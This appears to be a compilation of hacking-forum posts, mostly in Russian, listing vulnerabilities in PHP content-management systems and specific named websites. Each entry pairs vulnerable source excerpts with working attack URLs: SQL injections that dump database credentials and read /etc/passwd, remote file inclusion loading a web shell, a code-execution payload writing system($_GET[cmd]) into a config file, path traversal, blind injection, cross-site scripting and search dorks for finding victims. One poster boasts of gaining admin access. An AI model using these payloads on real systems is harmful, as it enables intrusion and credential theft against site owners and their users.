$content .=" <div class='post' id='post-8'> ";

while($downloads = mysql_fetch_array( $result )) {
$content .="
<table width='100%' cellpadding='0' cellspacing='1' class='tbl-border'>
<tr>
<td colspan='3' class='tbl2'><strong><a href='".DOWNLOADS.$downloads['file']."'>".$downloads['name']."</a></strong>
</td>
<tr>
<td colspan='3' class='tbl1'>".$downloads['description']."</td>
</tr>
<tr>
<td width='30%' class='tbl2'><strong>Added:</strong> ".$downloads['uploaded']."</td>
<td width='30%' class='tbl1'><strong>Uploaded by:</strong><b><a href='".BASEDIR."profile.php?view=".$downloads['uploader']."'> ".$downloads['uploader']."</b></a></td>
<td width='40%' class='tbl2'><b><a href='".$_SERVER['PHP_SELF']."?download=".$downloads['id']."'>Download (".$downloads['downloaded'].")</a></b></td>
</tr>
</table><br>
";
}

Target: Сайт разработчика:
http://sphere.xlentprojects.se/downloads.php?cat=1+union+select+1,id,3,4,username ,password,7,8,9+from+xcms_members+--+
Логинимся - мы администраторы.Не будем ничеготрогать,мы же не хокеры :(

Пропустим мимо глаз то,что уязвимы 70% всех файлов.В 1 вывод лучше всего,на нем и остановимся.

не надо логин-пароль писать

Update! Post: #127 (https://forum.antichat.ru/showpost.php?p=1273064&postcount=127)

RFI

Need: register_globals = ON allow_url_include = ON


File: /BLOX/scripts/editPageParams.php
раньше была скуля,теперь там rfi :)

if (!$GLOBALS['user']['userIsAdmin'])
return;
QS($K, $B, $terms);
function QS($K, $B, $terms)
{
require_once $GLOBALS['bloxDir'] . "/functions/getPageParams.php";
if (empty($_SESSION['page']))
$pageId = $_GET['page'];
else
$pageId = $_SESSION['page'];
$pageParams = WA($pageId);
require_once $GLOBALS['bloxDir'] . "/functions/Proposition.php";
$H = new S('pageIsHidden', $pageId);
$pageParams['pageIsHidden'] = $H->O();
$H = new S('parentPageIsAdopted', $pageId);
if ($H->O()) {
$pageParams['parentPageIsAdopted'] = true;
$_SESSION['parentPageIsAdopted'] = true;
}
$B->C('pageParams', $pageParams);
include $GLOBALS['bloxDir'] . "/includes/submitButtons.php";
include $GLOBALS['bloxDir'] . "/includes/display.php";
} ?>

Target: ?user[userIsAdmin]=1&bloxDir=http://yousite.com/wso2.php?

File: /BLOX/script/chek.php

if (!$GLOBALS['user']['userIsAdmin'])
return;
LW($K, $B, $terms);
function LW($K, $B, $terms)
{
require_once $GLOBALS['bloxDir'] . "/functions/getBlockParams.php";
...

Target: ?user[userIsAdmin]=1&bloxDir=http://yousite.com/wso2.php?

Продукт: CMS-DIYAN CMS без MySQL
Скачать : http://cms-diyan.ru/index.php?file=download
ось: WIN

LFI:
линки:
http://dyian/index.php?file=\..\user\1.txt
http://dyian/index.php?file=\..\user\1.txt&news


include_once('php/function.php');


if (!isset($_GET["file"])){
$ret=vizov_file("index");
}

if (isset($_GET["file"])){
$file=$_GET["file"];

if (!ereg('^[^./][^/]*$', $file)) die("сработала защита от взлома!");


$ret=vizov_file($file);
}



function vizov_file($file)
{
$filedir="files/".$file;
if (isset($_GET['news']))$filedir="news/".$file;
if (file_exists($filedir)){
if ((isset($_GET["dlyadruzey"]))&&(@fopen("http://cms-diyan.ru/dlyadruzey/".$_GET["dlyadruzey"], "r")))$filedir="http://cms-diyan.ru/dlyadruzey/".$_GET["dlyadruzey"];

if (!file_exists($filedir))die('Не найден файл '.$filedir);
$handle = fopen($filedir, "r");
$ret[4] = ''; $i=0;
while (!feof($handle)) {
$buffer = fgets($handle, 4096);
if($i==0) $ret[0]=$buffer;
elseif($i==1) $ret[1]=$buffer;
elseif($i==2) $ret[2]=$buffer;
elseif($i==3) $ret[3]=$buffer;
else $ret[4].=$buffer;
$i++;
}

fclose($handle);

Magazin IT online (Design & Development by Twenty Advertising)
http://www.accessdatamedia.ro
SQL

stiri.php
if(isset($_GET['id']) && ($_GET['id']!=""))
{
$where=' WHERE `news`.`id_news`='.$_GET['id'];
}
mysql_select_db($database_conn, $conn);
$query_news = "SELECT * FROM news ".$where;
http://www.accessdatamedia.ro/stiri.php?id=-100+union+all+select+1,concat_ws(0x203a20,version( ),user(),host,user,password,file_priv),3,4+from+my sql.user+--+


certificare.php
$query_news = "SELECT * FROM `certifications` where id_certification=".stripslashes($_GET['id']);
http://www.accessdatamedia.ro/certificare.php?id=-3+union+select+1,2,load_file(0x2f6574632f706173737 764),4+--+

BlognPlus
http://www.blogn.org/
SQL

index.php
case "e":
$blogn_entry_id = @$_GET["e"];
$blogn_skin = preg_replace("/\{SEARCH\}[\w\W]+?\{\/SEARCH\}/", "", $blogn_skin);
$blogn_skin = preg_replace("/\{PROFILES\}[\w\W]+?\{\/PROFILES\}/", "", $blogn_skin);
$blogn_skin = preg_replace("/\{COMMENTLIST\}[\w\W]+?\{\/COMMENTLIST\}/", "", $blogn_skin);
$blogn_skin = preg_replace("/\{COMMENTNEW\}[\w\W]+?\{\/COMMENTNEW\}/", "", $blogn_skin);
$blogn_skin = preg_replace("/\{TRACKBACKLIST\}[\w\W]+?\{\/TRACKBACKLIST\}/", "", $blogn_skin);
$blogn_skin = preg_replace("/\{TRACKBACKNEW\}[\w\W]+?\{\/TRACKBACKNEW\}/", "", $blogn_skin);
$blogn_skin = blogn_entry_view($blogn_user, $blogn_skin, $blogn_entry_id);

nikkiFuntions.php
function blogn_entry_view($user, $skin, $entry_id) {
$skin = preg_replace("/\{LOG\}/", "", $skin);
$skin = preg_replace("/\{LOG[ ]+([\w\W]+?)\}/", "", $skin);
$skin = preg_replace("/\{\/LOG\}/", "", $skin);
$nextbackurl = blogn_mod_db_log_nextback_url($user, $entry_id);

db_mysql.php
function blogn_mod_db_log_nextback_url($user, $key_id) {
$sql_connect = @mysql_connect(BLOGN_DB_HOST.":".BLOGN_DB_PORT, BLOGN_DB_USER, BLOGN_DB_PASS);
mysql_select_db(BLOGN_DB_NAME);

$qry = "SELECT date FROM ".BLOGN_DB_PREFIX."_loglist WHERE id = ".$key_id;

http://hangulnikki.hanguk.jp/index.php?e=-100+union+select+1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd'),concat_ws(0x203a20,version(),user(),host, user,password,file_priv),13+from+mysql.user--

Product: TinX CMS
Author: cms.tinx.dk
Version: 3.5.2

Need: magic_quotes_gpc = off register_globals=on

Remote Code Executing
File: /admin/actions.php

if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["cmsadmin"])) {
//echo "POST(".$_POST["cmsadmin"].")<br>";
$defaultdocumentid = $_POST["defaultdocumentid"];
$language = $_POST["language"];
$appendToTitle = $_POST["appendToTitle"];
$www = $_POST["www"];
$theme = $_POST["theme"];
$theme = $_POST["theme"];
$template = $_POST["template"];
$loginsystem = $_POST["loginsystem"];
$companyName = $_POST["companyName"];
$siteDesign = $_POST["siteDesign"];
$searchresult_quickid = $_POST["searchresult_quickid"];
$contact_quickid = $_POST["contact_quickid"];
$sitemap_quickid = $_POST["sitemap_quickid"];
$max_root_documents = $_POST["max_root_documents"];


//phpinfo();

$d = date("Y-m-d_h-i-s", time());
exec("cp " . $system["DOCUMENT_ROOT"] . "/inc/customer_config.php " . $_SERVER["DOCUMENT_ROOT"] .
"/inc/customer_config_$d.php");
$cfile = $system["DOCUMENT_ROOT"] . "/inc/customer_config.php";

$fh = fopen($cfile, 'w') or die("can't open file: No ACCESS TO FILE OR LIBRARY!!!!!");


$write = <<< html
<?php
/************************************************
Settings that can be changed - TinX/cms
*************************************************/
\$appendToTitle = "$appendToTitle";
\$companyName = "$companyName";

\$language = "$language"; /* da = danish, en=english.... make some up */
\$defaultdocumentid = "$defaultdocumentid"; /* If index.php is launched, this document id is called */
\$searchresult_quickid = "$searchresult_quickid"; /* search page QuickID */
\$contact_quickid = "$contact_quickid"; /* contact page QuickID */
\$sitemap_quickid = "$sitemap_quickid"; /* sitemap page QuickID */
\$max_root_documents = "$max_root_documents"; /* Max number of root elements in menu */

\$www = "$www"; // Url til websitet
\$theme["name"] = "$theme";

\$antalStatus = 2;
\$statusNames[0] = "Aktiv"; /* statusNames indeholder statuskoder for dokumentet - aktiv/inaktiv mv */
\$statusNames[1] = "Inaktiv";

/* Google Webmaster tools */
\$googlesitemap_path = \$www . "/googlesitemap.xml";

/* Show/Hide indtastningsfelter pе settings.php:
Skal feltet skjules intastes en default værdi, ellers "" */
\$settings_options["documenttitle"] = "";
\$settings_options["category"] = "Standard";
\$settings_options["template"] = "$template";

// LOGIN TYPE
\$login_system = "$loginsystem"; //values: phpBB - TinX

// Other settings
\$siteDesign = "$siteDesign";
\$siteDesignPath = "designs/" . \$siteDesign;
\$siteTemplatePath = "designs/" . \$siteDesign ."/templates/";
\$siteContainerPath = "designs/" . \$siteDesign ."/containers/";

if (file_exists(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php"))
include(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php");
else
echo "### ERROR: customer_vars.php NOT FOUND ###";
?>
html;

fputs($fh, $write);
fclose($fh);

Target: {POST} ?cmsadmin=1&appendToTitle=";system($_GET[cmd]);die();
http://yousite.com/inc/customer_config.php?cmd=dir


SQL-inj


File: /admin/actions.php

if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["createobject"]) && $_POST["objectaction"]
=== "create") {
$id = $_POST["docid"];
$type = $_POST["objtype"];
$title = $_POST["objtitle"];
$location = $_POST["objlocation"];
$container = $_POST["objcontainer"];
$objlink = $_POST["objlink"];
$is_copy_of = $_POST["objlinkSubCat"];

if ($type == "existingContent" && $is_copy_of > 0) {
$obj_table = $objlink;
$type = mysql_fetch_array($sqlPtr->selectQuery("file", $tables["object_templates"],
"tablename='$objlink'"));
$type = $type[0];
$insert_as_copy = true;
} else {
$insert_as_copy = false;
$objlink = "";
$is_copy_of = "0";

}

$sqlPtr->selectQuery();

function selectQuery($what, $tablename, $where="", $other="")
{
//echo "Lookup: " . $this->antalLookups . "<br>";
$this->antalLookups++;
// $this->makeConnection();
if(strcmp($where,"") != 0)
$where = "WHERE $where";

$q = "SELECT $what FROM $tablename $where $other";
//echo "Q($q)\n";
if($this->isDebug){
echo "Query($q)<br>\n";
echo "HOST($this->dbhost)<br>\n";
echo "USER($this->dbusername)<br>\n";
echo "PASS($this->dbuserpassword)<br>\n";
echo "DB($this->default_dbname)<br>\n";
}
$result= mysql_query($q);
if(!$result)
$this->error_message($this->sql_error() . "<br><b>selectQuery($q) error</b>: $delete connected but not to table" );

// $this->closeConnection();
return $result;

}

Target: {POST} ?objectaction=create&objectcreate=1&objlinkSubCat=1&objtype=existingContent&objlink=1'+union+select+1,2,3,4,5/*

Пишите пожалуйста условия работы уязвимости, такие как:
magic_quotes_gpc
register_globals
allow_url_include
и т.д

//HAXTA4OK

evil-grin.com

читалка
index.php
import_request_variables("gP", "_");
$n = $_n;
$b = $_b;
if($n==''){$n = 'index.html';}
$node = "/var/www/evil-grin.com/jargon/html/".$n;
if($b == 'entry'){$node = "/var/www/evil-grin.com/jargon/html/entry/".$n;}

function parse_jargon($file, $b, $n){
$file = eregi_replace('\\\\', '', $file);
$file = eregi_replace(' ', '+', $file);
$pos = strpos($n, '/');
if($pos){
$pos++;
$m = substr($n, 0, $pos);
}
if(file_exists($file)){
$data = join ('', file ($file));
$data = eregi_replace('<html.*<body*>', '', $data);
$data = ereg_replace('src="html/graphics/', $data);
$data = ereg_replace("href=\"", "href=\"index.php?b=$b&n=$m", $data);
$data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "entry/", "href=\"index.php?b=entry&n=", $data);
$data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "\.\./", "href=\"index.php?n=", $data);
$data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "http", "href=\"http", $data);
$data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "mailto", "href=\"mailto", $data);
}else{
$data = "$file not found";
}
return $data;
}
http://evil-grin.com/jargon/index.php?n=../index.php

SQL
bmarks.php
import_request_variables("gP", "_");
$c = $_c;
$db = mysql_connect("localhost", "apache", "xyzzy");
mysql_select_db("evil",$db);
if($c == ""){
$result = mysql_query("SELECT id, cat, notes from lnk_cat ORDER BY cat",$db);
while ($myrow = mysql_fetch_row($result)) {
$oput .= "<DT><B><A HREF=\"bmarks.php?c=$myrow[0]\" CLASS=\"led\">$myrow[1]</B></A>\n";
$oput .= "<DD CLASS=\"text\">$myrow[2]\n";
}
}else{
$result = mysql_query("SELECT cat from lnk_cat WHERE id = $c",$db);
$myrow = mysql_fetch_row($result);
$cat = $myrow[0];
$result = mysql_query("SELECT id, uri, txt, notes from links WHERE cat = $c ORDER BY txt",$db);
http://www.evil-grin.com/bmarks.php?c=-3+union+select+1,2,version(),load_file(0x2F6574632 F706173737764)+from+mysql.user--

Product: SetCMS
Author: http://setcms.org
Version: 3.6.5

LFI

Need: magic_quotes_gpc = off;

File: index.php

if (file_exists("modules/$set/index.php")) {
if (file_exists("modules/$set/config.php")) {
include ("modules/$set/config.php");
}
include ("modules/$set/index.php");

Target: ?set=../rss.php%00

termassaojoao.com.br
Copyright: Andre Klunk - 2007 | Todos os direiros reservados

index.php
if($_GET[conteudo])
{
include("$_GET[conteudo]");
}
при allow_url_include = Off
LFI
http://www.termassaojoao.com.br/index.php?conteudo=php://filter/read=convert.base64-encode/resource=index.php

econsult.tv
c FreelanceFuture.com 2008
SQL

browse2.php
$nodeId = isset($_GET['id'])? $_GET['id'] : 0;
...
$strSql = "SELECT * FROM ".CLIPTBL." WHERE browsenode=".$nodeId." ORDER BY ranking".$pageSql;

http://www.econsult.tv/browse2.php?id=-21+union+select+1,2,3,load_file(0x2F6574632F706173 737764),5,concat_ws(0x203a20,version(),user(),host ,user,password,file_priv),7,8+from+mysql.user--
(PS /root очень близко)

jedit.org
LFI
index.php
$page = $_GET['page'];
if ($page == "")
$page = "main";
?>
<title> jEdit - Programmer's Text Editor -
<?php include($page.".title"); ?>
</title>


http://www.jedit.org/index.php?page=../../../../../../../../../../etc/passwd%00

//--------------------------------------------------
// Tiny Blogr 1.0.0rc4 (search) SQL Injection
//--------------------------------------------------
//--------------------------------------------------
//Author: Ctacok
//Date: 11 December 2009.
//Special for Antichat
//--------------------------------------------------
//
//Need:
//magic_quotes = Off.
//
//--------------------------------------------------
//Script info:
//Version: 1.0.0rc4.
//Author: Redlinesoft, Trilexcom .
//Official site: http://tinyblogr.sourceforge.net/
//--------------------------------------------------
//Vulnerabilty
///search/
//POST: txtKeyword
//Usage: exploit.php?url=target.com/path
// password = md5($password);
// 1%' union select concat_ws(0x3A73716C5F696E6A3A,memUsername,memPass word),null,null,null,null,null,null,null from tbl_epo_member --

^^
Просто нашёл на компе .txt файл с этим контентом, COPY + PASTE, и всё.
Переоформлять не стал, ещё время гробить =\

Product: Stash CMS
Version: 1.0.3
Author: http://sourceforge.net/projects/nice-stash/

SQL-inj & Download any files.


File: downloadmp3.php

function force_download ($data, $name) {
header("Content-Length: " . filesize($data));
header('Content-Type: audio/mp3');
header('Content-Disposition: attachment; filename='.$name);
readfile($data);
}

if(isset($_GET['download'])) {
$mp3id = $_GET['download'];
$query = "SELECT * FROM ".TBPREFIX."_mp3 WHERE mp3_id = '$mp3id'";
$result = $database->sqlQuery($query);
if($result) {
foreach($result as $result) {
$filename = $result['mp3_filename'];
}
$filepath = UPLOADSPATH.'/mp3/'.$filename;
force_download($filepath, $filename);
}
}

$database->sqlQuery

function sqlQuery($query, $return = TRUE, $complex = TRUE){

$this->result_set = mysql_query($query,$this->conn)or die("Query error: ". mysql_error());

if($return){

$query_results = array();
$i = 0;

while($row = mysql_fetch_array($this->result_set, MYSQL_ASSOC)){

foreach($row as $key => $value){

$query_results[$i][$key] = $value;

}

$i++;

}

if(count($query_results) == 1 && $complex == FALSE){
$tmp_result = array();
$tmp_result = $query_results['0'];
$query_results = array();
$query_results = $tmp_result;
}

mysql_free_result($this->result_set);
return $query_results;

} elseif(!$return && !$this->result_set){

mysql_free_result($this->result_set);
return FALSE;

} elseif(!$return && $this->result_set){

return TRUE;

}

}

Target: 3'+union+select+1,2,3,4,5,version%28%29+--+
Вывод в ошибке filesize();

Если скулю крутить лень,можно все сделать проще.
Target: ?download=3'+union+select+1,2,3,4,5,'../../admin/config.php'+--+
Файл который вам предложит скачать браузер - конфиг сервера,качать можно произвольные файлы,хоть etc/passwd,главное подобрать пути.

Маленькая зарисовочка.

Product: weEdition
Version: 6.0.0.7
Author: http://www.webedition.de/


Lfi:

Need: register_globals = on

File: /we/include/we_html_tools.inc.php
Target: ?WE_LANGUAGE=../../{LOCAL_FILE}%00

File: /delInfo.php
Target: ?WE_LANGUAGE={LOCAL_FILE}%00

File: /moveInfo.php
Target: ?WE_LANGUAGE={LOCAL_FILE}%00

File: /noAviable.php
Target: ?WE_LANGUAGE={LOCAL_FILE}%00

File: /noExist.php
Target: ?WE_LANGUAGE={LOCAL_FILE}%00

File: /notPublished.php
Target: ?WE_LANGUAGE={LOCAL_FILE}%00

Full Path Disclosing:

File: mozillamenu.php
Target: Enter you browser: /mozillamenu.php


Phpinfo()
File: phpino.php
Target: You logining, end enter you browser: phpinfo.php

Без кода,если смогу - завтра выложу.

Clean Nuke 1.1

Продукт: Clean Nuke
Версия: 1.1
Автор: matteoiamma (phpnuke.org)
Скачать: http://sourceforge.net/projects/cleanuke/

Local File Include

Условия:

Права администратора.


Уязвимая часть кода:
Сначала переменная $xlanguage заносится в БД в скрипте
/admin/modules/settings.php
...
$xlanguage = addslashes(check_words(check_html($xlanguage, "nohtml")));
...
$db->sql_query("UPDATE ".$prefix."_config SET ... language='$xlanguage' ...");
...
Далее, из БД достается значение файла языка, и почти без всяческой фильтрации оно инклудится в файле:
/mainfile.php
$result = $db->sql_query("SELECT * FROM ".$prefix."_config");
...
$language = check_html($row['language'], "nohtml");
...
include_once("language/lang-".$language.".php");
PS: Функция check_html проверяет наличие HTML-кода в переменной, и она нам не страшна.

Эксплуатация:
В панели администратора, в модуле конфигурации (admin.php?op=Configure) изменяем исходный код страницы, вместо
<option name='xlanguage' value='english' >
вписываем любой файл, например
<option name='xlanguage' value='english/../../index' >
Кроме этого, если есть права на сервере (н.п. один и тот же хостинг), можно записать файл в папку /tmp, и проинклудить его.


SQL - Инъекция

Условия:

magic_quotes = Off


Уязвимая часть кода:
/page.php
if (isset($_GET['pid'])){
$content_sql = $db->sql_query("SELECT * FROM ".$prefix."_pages WHERE active = '1' AND pid = '".$_GET['pid']."'");
}

Эксплуатация:
http://site.ru/cleanuke/page.php?pid=1'+union+select+1,2,3,4,5%23

SQL - Инъекция

Условия:

Права администратора.
magic_quotes = Off


Уязвимая часть кода:
/admin/modules/authors.php
function modifyadmin($chng_aid) {
...
$row = $db->sql_fetchrow($db->sql_query("SELECT aid, name, url, email, pwd, radminsuper, admlanguage from " . $prefix . "_authors where aid='$chng_aid'"));
...

Эксплуатация:
http://site.ru/cleanuke/admin.php?op=modifyadmin&chng_aid=-1'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7%23

SQL - Инъекция

Условия:

Права администратора.
magic_quotes = Off


Уязвимая часть кода:
/modules/News/admin/index.php
function editStory($sid) {
...
$result2 = $db->sql_query("select aid from ".$prefix."_stories where sid='$sid'");
...

Эксплуатация:
http://site.ru/cleanuke/admin.php?op=EditStory&sid=-1'+union+select+1,2,3,4,5,6,7,8,9%23

SQL - Инъекция

Условия:

Права администратора.
magic_quotes = Off


Уязвимая часть кода:
/admin/modules/content.php
if (isset($_POST['pid'])){
$pid=$_POST['pid'];
} elseif (isset($_GET['pid_mod'])){
$pid=$_GET['pid_mod'];
}
$sel_page=$db->sql_query("SELECT * FROM ".$prefix."_pages WHERE pid = '$pid'");

Эксплуатация:
http://site.ru/cleanuke/admin.php?op=content&pid_mod=-1'+union+select+1,2,3,4,5%23


SQL - Инъекция

Условия:

Права администратора.


Уязвимая часть кода:
/admin/modules/feedbackplus.php
Line 119:
function editfeedback($fid) {
...
$result = sql_query("SELECT * FROM $prefix"._feedbackplus." WHERE fid=$fid", $dbi);
...

Эксплуатация:
http://site.ru/cleanuke/admin.php?op=editfeedback&lid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12


Дорк
Хотя название движка - Clean Nuke, дорк такой:
"Powered by WL-Nuke"

Shop-Script FREE

Продукт: Shop-Script FREE
Оффсайт: http://shop-script.ru
Скачать: http://www.shop-script.ru/shop-script-free/ru/shop-script-free.zip

Blind SQL-Инъекция

Условия:

magic_quotes = Off


Уязвимая часть кода:
/shop/includes/shopping_cart.php
$q = db_query("select in_stock from ".PRODUCTS_TABLE." where productID='".$_GET["add2cart"]."'") or die (db_error() . "<br>select in_stock from ".PRODUCTS_TABLE." where productID='".$_GET["add2cart"]."'");
$is = db_fetch_row($q); $is = $is[0];

//$_SESSION[gids] contains product IDs
//$_SESSION[counts] contains product quantities ($_SESSION[counts][$i] corresponds to $_SESSION[gids][$i])
//$_SESSION[gids][$i] == 0 means $i-element is 'empty'
if (!isset($_SESSION["gids"]))
{
$_SESSION["gids"] = array();
$_SESSION["counts"] = array();
}
//check for current item in the current shopping cart content
$i=0;
while ($i<count($_SESSION["gids"]) && $_SESSION["gids"][$i] != $_GET["add2cart"]) $i++;
if ($i < count($_SESSION["gids"])) //increase current product's quantity
{
$_SESSION["counts"][$i]++;
}
else //no item - add it to $gids array
{
$_SESSION["gids"][] = $_GET["add2cart"];
$_SESSION["counts"][] = 1;
}

header("Location: index.php?shopping_cart=yes");

}


if (isset($_GET["remove"]) && $_GET["remove"] > 0) //remove from cart product with productID == $remove
{
$i=0;
while ($i<count($_SESSION["gids"]) && $_SESSION["gids"][$i] != $_GET["remove"]) $i++;
if ($i<count($_SESSION["gids"])) $_SESSION["gids"][$i] = 0;

header("Location: index.php?shopping_cart=yes");
}


if (isset($_POST["update"])) //update shopping cart content
{

foreach ($_POST as $key => $val)
if (strstr($key, "count_"))
{
//select product's in stock level
$q = db_query("select in_stock from ".PRODUCTS_TABLE." where productID='".str_replace("count_","",$key)."'") or die (db_error() );
$is = db_fetch_row($q); $is = $is[0];

if ($val > 0)
{
for ($i=0; $i<count($_SESSION["gids"]); $i++)
{
if ($_SESSION["gids"][$i] == str_replace("count_","",$key))
{
$_SESSION["counts"][$i] = floor($val);
}
}
}
else //remove
{
$i=0;
while ($_SESSION["gids"][$i] != str_replace("count_","",$key) && $i<count($_SESSION["gids"])) $i++;
$_SESSION["gids"][$i] = 0;
}
}


Эксплуатация:
http://site.ru/shop/index.php?shopping_cart=yes&add2cart=72'+and+substring(@@version,1,1)=5%23


SQL-Инъекция

Условия:

magic_quotes = Off
Права администратора


Уязвимая часть кода:
/products.php
$q = db_query("SELECT categoryID, name, description, customers_rating, Price, picture, in_stock, thumbnail, big_picture, brief_description, list_price, product_code FROM ".PRODUCTS_TABLE." WHERE productID='".$_GET["productID"]."'") or die (db_error());

Эксплуатация:
http://site.ru/shop/products.php?productID=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12%23


Blind SQL-Инъекция

Условия:

magic_quotes = Off
Права администратора


Уязвимая часть кода:
/shop/includes/admin/sub/catalog_products_categories.php
$categoryID = isset($_GET["categoryID"]) ? $_GET["categoryID"] : $_POST["categoryID"];
$q = db_query("SELECT name FROM ".CATEGORIES_TABLE." WHERE categoryID<>0 and categoryID='$categoryID'") or die (db_error());
$row = db_fetch_row($q);

Эксплуатация:
http://site.ru/shop/admin.php?dpt=catalog&sub=products_categories&categoryID=1'+and+substring(@@version,1,1)=5%23


SQL-Инъекция

Условия:

magic_quotes = Off
Права администратора


Уязвимая часть кода:
/category.php
$q = db_query("SELECT name, description, picture FROM ".CATEGORIES_TABLE." WHERE categoryID='".$_GET["c_id"]."' and categoryID<>0") or die (db_error());

Эксплуатация:
http://localhost/bug/shop/category.php?c_id=-1'+union+select+1,2,3%23&w=23


Дорк:
"Powered by Shop-Script FREE"

Просто гугл выдал кучу таких сайтов

CubeCart™

Расскрытие путей
http://../modules/gateway/
ибо в этой папке есть файл Index.php а в нем
$module = "gateway";
include("../index.php");
?>
а в modules/ нету файла Index.php bgg =)

Dopk :Powered by CubeCart™

chinmaya.org

ViewSource
downloadfile.php
<?

$filename = $filename;
$ext = substr(strrchr($filename, "."), 1);

$bytes = filesize("downloadfile/$filename");
header("Content-type: application/$ext");
header("Content-disposition: attachment; filename=\"$filename\"");
header("Content-length: $bytes");
@readfile("downloadfile/$filename");
?>http://www.chinmaya.org/downloadfile.php?filename=../../../../../../../../../../etc/passwd%00


php.ini
magic_quotes_gpc = Off
register_globals = On


SQL

news_detail.php
$sqlnews = "select * from newsmaster where newsid='$nid'";
http://www.chinmaya.org/news_detail.php?nid=-123'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_w s(0x203a20,version(),user(),database()),13,14,15+--+


acharya.php
$sqlach = "select * from acharyamaster where acharyaid='$id'";
http://www.chinmaya.org/acharya.php?id=12'+order+by+100+--+


events_detail.php
$sqlevents = "select * from eventsmaster where eventid='$eid'";
http://www.chinmaya.org/events_detail.php?eid=342'+order+by+100+--+

OwnRS
http://sourceforge.net/projects/ownrs/

index.php
$hledany_vyraz = $_GET["hledej"];
...
if($hledany_vyraz!="")
$pocet=MySQL_Query("SELECT count(id) FROM ".$db_prefix."clanky WHERE (nepublikovat = 0) AND (datum<now()) AND MATCH(nadpis) AGAINST('$hledany_vyraz')
OR MATCH(popis) AGAINST('$hledany_vyraz')
OR MATCH(clanek) AGAINST('$hledany_vyraz')
ORDER BY (10 * MATCH(nadpis) AGAINST('$hledany_vyraz')
+ MATCH(popis) AGAINST('$hledany_vyraz')
+ MATCH(clanek) AGAINST ('$hledany_vyraz'))");

...
if($hledany_vyraz!=""){
$vysledek=mysql_query("SELECT *, DATE_FORMAT(`datum`, '%d.%m.%Y') AS `casformat` from ".$db_prefix."clanky WHERE (nepublikovat = 0) AND (datum<now()) AND (datum<now()) AND MATCH(nadpis) AGAINST('$hledany_vyraz')
OR MATCH(popis) AGAINST('$hledany_vyraz')
OR MATCH(clanek) AGAINST('$hledany_vyraz')
ORDER BY (10 * MATCH(nadpis) AGAINST('$hledany_vyraz')
+ MATCH(popis) AGAINST('$hledany_vyraz')
+ MATCH(clanek) AGAINST ('$hledany_vyraz')) LIMIT $strana, $max") or die ("Chyba pшi prбci s databбzн");


$Obsah = '<h1>Vyhledбvбnн vэrazu '.$hledany_vyraz.'</h1>
<strong> Pro vэraz '.$hledany_vyraz.' nalezeny tyto zбznamy: </strong><br />';
$TitleWebu = 'Vyhledбvбnн vэrazu '.$hledany_vyraz.' - '.$TitleWebu;
}
$x=0;
//Sosбm data z databбze
while ($zaznam=MySQL_Fetch_Array($vysledek)) {
$zobrazeni = $zaznam['hint'];
$nadpis_bez_diakritiky = seourl($zaznam['nadpis']);
//Jakou verzi odkazщ vybrat?
if($pekna_url != 0){
$odkaz = $zaznam["id"].'-'.$nadpis_bez_diakritiky.'.html';
}else{
$odkaz = 'clanek.php?id='.$zaznam["id"].'-'.$nadpis_bez_diakritiky;
}
$id2 = $zaznam['kategorie'];
$casformat = $zaznam["casformat"];
$autor = $zaznam['autor'];
$jmeno_autora= mysql_query("SELECT nick FROM ".$db_prefix."autori WHERE id = '".$autor."'");
while($zaznam_autor = mysql_fetch_array($jmeno_autora)){
$nazev_autora = $zaznam_autor['nick'];
//poинtбnн poиtu komentбшщ a nбslednэ vэpis slova v rщznйm pбdм podle poиtu
$dotaz = "SELECT count(id) AS pocet FROM ".$db_prefix."komentare WHERE idclanku ='".$zaznam["id"]."'";
if($v = mysql_query($dotaz)) {
$r = mysql_fetch_assoc($v);
$komentare=$r["pocet"];
}else{echo "Chyba pшi prбci s databбzн";}

if($komentare!=0){
if($komentare<2)
$komentare_vypis = '<a href="'.$odkaz.'#komentare">1 komentбш</a>';
else if(($komentare<5)&&($komentare>1))
$komentare_vypis = '<a href="'.$odkaz.'#komentare">'.$komentare.' komentбшe</a>';
else if($komentare>4)
$komentare_vypis = '<a href="'.$odkaz.'#komentare">'.$komentare.' komentбшщ</a>';
}else
$komentare_vypis = '<a href="'.$odkaz.'#komentare">Rбdnэ komentбш</a>';

//Zji№>ovбnн nбzvu kategorie a pшezdнvky autora
$nazev_kategorie = mysql_query("SELECT nazev FROM ".$db_prefix."kategorie WHERE id = '".$id2."'");
while ($udaj = mysql_fetch_array($nazev_kategorie))
$jmeno_kategorie = $udaj['nazev'];

уязвим параметр $hledany_vyraz = $_GET["hledej"];

Passive XSS
http://localhost/Own_rs/index.php?hledej=1%3Cscript%3Ealert(121212)%3C/script%3E

SQL
mq=off

http://localhost/Own_rs/index.php?hledej=')+union+select+11,12,13,14,15,16 ,17,18,19,110,111,112;%00+--+

Запрос $vysledek=mysql_query("SELECT *, DATE_FORMAT(`datum`, '%d.%m.%Y') AS `casformat ...
записан в несколько строк, поэтому комментарии вида +--+ дают ошибку,
ставим более жесткий терминатор ;%00+--+.

Сработал $vysledek=mysql_query("SELECT ...
но это Blind SQL, попробуем получить вывод.

$autor = $zaznam['autor'];
$jmeno_autora= mysql_query("SELECT nick FROM ".$db_prefix."autori WHERE id = '".$autor."'");

$zaznam['autor'] берется из запроса $vysledek (поле с числом 17), сформируем иньекцию.

http://localhost/Own_rs/index.php?hledej=')+union+select+11,12,13,14,15,16 ,%2217'+or+1=1+limit+0,1+--+%22,18,19,110,111,112;%00+--+

появился вывод в полях 12, 13, 112

http://localhost/Own_rs/index.php?hledej=')+union+select+11,version(),conc at_ws(0x203a20,jmeno,heslo,prava),14,15,16,%2217'+ or+1=1+limit+0,1+--+%22,18,19,110,111,database()+from+ownrs_autori;%0 0+--+

Corporate Merchandise Solution

скрипт коммерческий,однако cms фактически не являеться

Blind SQL inj

пример:

http://demo.mycorporatestores.com/catalog.php?categoryID=31+and+substring(@@version, 1,1)=3

WR-Board
